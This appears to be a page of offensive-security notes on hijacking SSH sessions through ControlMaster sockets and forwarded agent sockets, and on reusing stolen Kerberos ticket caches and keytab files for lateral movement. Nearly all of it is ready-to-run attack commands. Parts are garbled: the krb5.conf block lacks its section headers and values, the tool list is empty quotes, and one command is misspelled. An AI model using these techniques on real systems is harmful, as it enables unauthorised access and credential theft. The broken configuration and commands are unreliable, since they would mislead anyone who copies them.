SSH Hijacking with ControlMaster

ControlMaster allows to share multiple SSH sessions of a single Network Connection. Enabled by having a "~/.ssh/config" file:

Host *
    ControlPath ~/.ssh/cm/%r@%h:%p
    ControlMaster auto
    ControlPersist 5m

This stores the socket file as <user>@<host>:<port> in ~/.ssh/cm. ControlPersist declares how long this file should exist after the last connection is closed. When a victim SSHs into a target, this file will be created and we can use it to piggyback into the target as well:

ssh -S ~/.ssh/cm/<socketfile> user@target

This technique only allows to ssh into the specific servers we have socket files for.

SSH Hijacking with SSH Agent Forwarding

In this scenario a user connects to a target server via an intermediate server that forwards the connection. The attacker is on the intermediate server. This requires ForwardAgent yes in the users SSH config & AllowAgentForwarding yes in sshd_config. The compromised user needs to have an active connection to the intermediate server at the time of exploitation.

ps aux | grep ssh
ls -lah /tmp
SSH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh-add -l
SH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh user@target

This technique allows to SSH into any server the users "cached keys" have access to.


Setup on Linux Attacker Box

Add target box to /etc/hosts and install:

sudo apt install krb5-user


        default_realm = EXAMPLE.COM
        dns_canonicalize_hostname = false

        EXAMPLE.COM = {
        kdc =
        admin_server =


[domain_realm] = EXAMPLE.COM = EXAMPLE.COM


env | grep KRB5CCNAME

All (or nearly all?) impacket tools support "-k" parameter and can use kerberos, e.g. "", "", "".


Ldapsearch using Kerberos authentication:

ldapsearch -Y GSSAPI -H ldap://<target> -D "<user>@<domain>" -W -b "dc=domain,dc=domain" "servicePrincipalName=*" servicePrincipalName


Check /tmp for krb5* files. We can directly use these if we can access them after making a copy and changing ownership to our user:

export KRB5CCNAME=/tmp/krb5cc_<user>


Keytab files are sort of stored kerberos principal names & keys for scripts. Create via:

addent -password -p <user>@<domain> -k 1 -e rc4-hmac
<enter password>
wkt /tmp/<user>.keytab

Use via:

kinit <user>@<domain> -k -t /tmp/<user>.keytab
kinit -R

Last updated